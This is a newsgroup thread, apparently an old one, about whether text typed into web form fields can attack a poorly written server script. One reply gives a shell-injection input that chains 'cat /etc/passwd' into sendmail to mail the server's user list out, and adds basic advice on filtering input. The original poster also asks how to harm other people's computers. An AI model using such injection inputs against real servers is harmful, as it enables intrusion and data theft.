hack script and forms

[steve]

Hi all

what is it about that some one can paste script in the form field and
submit the form and than what?

can some one open my ice about that
I like to know the bead and the good things about it

Thanks

 

[Brian]

Hi all

what is it about that some one can paste script in the form field and
submit the form and than what?

can some one open my ice about that
I like to know the bead and the good things about it

Thanks

Hmmmm... I am guessing that this is a poor translation, because I have no
idea what you are asking... sorry.

 

[Lee]

Brian said:

Hmmmm... I am guessing that this is a poor translation, because I have no
idea what you are asking... sorry.

I think he was trying to be clever.
open my ice = "open my eyes".

 

[Brian]

Brian said:

I think he was trying to be clever.
open my ice = "open my eyes".

Yeah, I read it that way... I still dont know what he is asking, and it is
likely the case for the other readers of this group.

Brian

 

[Lee]

Brian said:

Yeah, I read it that way... I still dont know what he is asking, and it is
likely the case for the other readers of this group.

Oh. I understood the poorly-written question immediately, but my
first impression had been that "open my ice" was a mistranslation,
so I assumed that it was what was confusing you, too.

He seems to be asking if it's true that a badly written server-side
script can be coerced into executing code entered into form fields.

Yes. He should read up on web server security.

 

[620]

Yeah, I read it that way... I still dont know what he is asking, and it is
likely the case for the other readers of this group.

Brian

....in other words, what's this I hear about people putting script (i.e.,
"var x = 0 / 0;") into the textbox of a form and submitting the form. What
happens thereafter, someone explain it to me, and what are the good and...
bead things about it.

And the answer is:

In order to open the Closed Eye of the Ice Demon, you'll need a Bottled Fire
Elemental (get that in the linux/apache ng). Once the Eye is open, you take
your Beads of the Deliquent Monk that you get in this ng and wrap them
around the Ancient Staff of Warding (I have no idea where you get an ASoW
these days, check google). Once the Beads are on the Staff, a localised
blaze will ignite on the staff, about 3/4 of the way up. Let it burn itself
out. A charred, round depression (socket) will be left. Put the Open eye
into the charred socket. This creates the Visionary Staff of Deliquency.
Come back and see me after you've obtained the staff and I'll show you how
to smite a form with it.

 

[Brian]

Brian said:

Oh. I understood the poorly-written question immediately, but my
first impression had been that "open my ice" was a mistranslation,
so I assumed that it was what was confusing you, too.

He seems to be asking if it's true that a badly written server-side
script can be coerced into executing code entered into form fields.

Yes. He should read up on web server security.

Oh, in that case, the poster should stop being cute, and get to the point.
Basically, the answer is yes... it is very easy to screw with a badly
written server-side script.

For instance, let's say your script does something like:

exec("SomeShellFunction " + formValue + " someParamater");

and the user enters : something ; cat /etc/passwd | sendmail
(e-mail address removed);

That is a very simple example of making a mess, and finding all of the users
on the server

A good way to _start_ to prevent it, is to do some server-side variable
checking, and stripping illegal characters, such as ";`'@$ etc.

B

 

[steve]

Hi all

Oh. I understood the poorly-written question immediately, but my
first impression had been that "open my ice" was a mistranslation,
so I assumed that it was what was confusing you, too.

He seems to be asking if it's true that a badly written server-side
script can be coerced into executing code entered into form fields.

Yes. He should read up on web server security.

Sorry about my English
I did not try to be clever, I just wont to know as Lee gas how does
that work and does it effect the server or the user computer.

For example I have a web page .html with a form in site using form to
mail function.
What script can some body use to harm me or the server.
How can I protect myself from such scripts
and on the other hand
How can I use such script to harm somebody's computer or a server.

Thanks and I hope that you guys understand my English

 

[Lee]

steve said:

Sorry about my English

Sorry about guessing incorrectly.

I did not try to be clever, I just wont to know as Lee [guess] how does
that work and does it effect the server or the user computer.

The server.

For example I have a web page .html with a form in site using form to
mail function.
What script can some body use to harm me or the server.
How can I protect myself from such scripts

If you're using a form to mail function provided by your ISP or some
other site, then you (and they) should be safe. People don't usually
have much need to write their own, so I'm assuming that's the case.